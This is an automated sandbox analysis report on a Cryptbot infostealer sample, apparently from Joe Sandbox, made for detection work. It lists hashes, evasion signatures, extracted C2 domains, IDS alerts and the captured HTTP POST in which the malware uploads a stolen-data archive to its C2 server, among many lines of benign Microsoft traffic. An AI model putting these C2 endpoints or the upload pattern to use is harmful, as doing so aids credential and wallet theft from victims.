Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1562596
MD5: f60849e384fb4ff0403d1dc4278bdd0f
SHA1: c2b499208ae56ac7087a60e5bffb25b9989fb208
SHA256: 6f948e615073bdd5a3da30f5f31cb709dbe5105316736298c00d9731d1513435
Tags: exeuser-Bitsight
Infos:

Detection

Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Found malware configuration
Source: file.exe.1864.0.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["fvtekk5pn.top", "kk5pfvtekk5pn.top", "home.fvtekk5pn.top", "Efvtekk5pn.top", "analforeverlovyu.top", "fvtekk5pnvtekk5pn.top"]}
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 39%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Source: file.exe, 00000000.00000002.4587362165.0000000001203000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_811ca7c2-4
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49757 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49792 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:49821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49844 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49877 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.6:49898 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.6:49903 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49926 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49957 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50018 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50024 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50027 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50032 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50033 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50034 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\0absryc3.default\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:49849 -> 34.116.198.130:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: fvtekk5pn.top
Source: Malware configuration extractor URLs: kk5pfvtekk5pn.top
Source: Malware configuration extractor URLs: home.fvtekk5pn.top
Source: Malware configuration extractor URLs: Efvtekk5pn.top
Source: Malware configuration extractor URLs: analforeverlovyu.top
Source: Malware configuration extractor URLs: fvtekk5pnvtekk5pn.top
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 462Content-Type: multipart/form-data; boundary=------------------------0Pnkkn0JG4wzRnFTJ4FfwTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 30 50 6e 6b 6b 6e 30 4a 47 34 77 7a 52 6e 46 54 4a 34 46 66 77 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6f 66 61 70 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 5b 31 84 ce 7e fe 34 a1 0f d9 d0 aa 03 b0 65 c8 e5 c4 5f c4 5d 0f 19 37 bd ef 2f 3d 68 eb 1d f1 a2 dc 13 5e 65 58 dc 8f 1b 18 14 20 21 6f 98 7b ee 03 16 bb 76 26 44 f1 5e 66 58 7e 79 d9 e9 ed d8 ce ad 27 04 94 16 17 57 85 8b 40 33 0f 2e c3 c5 02 4e 30 3e 43 b4 4a dd a2 15 ec 14 6f e0 f4 09 bd ae c1 d8 2d 8d 0f a2 6d 26 af 5c 90 0b 77 de ea dc 72 b6 50 6a 4b 8d 96 3c ec b2 f5 a4 04 a5 de 2d 77 22 ce 7e 7d c3 5c 29 52 97 5a 85 76 53 52 66 e7 8f a4 9a ba 09 13 21 d1 a2 94 9f b4 d9 61 bd f4 a8 ff 40 1f 58 ad 78 68 a2 86 15 67 6c 3b 82 af a1 4b 8d 4b fa a8 ee a7 35 96 37 0c 0d 47 91 ca c6 e3 5e 37 a9 2d 6f ba 71 8e 7a 16 a8 20 7b db 12 f1 4d 06 97 db cc 22 bc 81 50 b1 3b 5a 9e 15 bd 78 29 41 e6 c9 01 37 b6 2f dc 46 df be 89 f3 33 6c c8 f3 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 30 50 6e 6b 6b 6e 30 4a 47 34 77 7a 52 6e 46 54 4a 34 46 66 77 54 2d 2d 0d 0a Data Ascii: --------------------------0Pnkkn0JG4wzRnFTJ4FfwTContent-Disposition: form-data; name="file"; filename="Sofapa.bin"Content-Type: application/octet-stream[1~4e_]7/=h^eX !o{v&D^fX~y'W@3.N0>CJo-m&\wrPjK<-w"~}\)RZvSRf!a@Xxhgl;KK57G^7-oqz {M"P;Zx)A7/F3l--------------------------0Pnkkn0JG4wzRnFTJ4FfwT--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View IP Address: 34.116.198.130 34.116.198.130
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=bDW3NAP4YPDLl8e&MD=fuLn+LMa HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
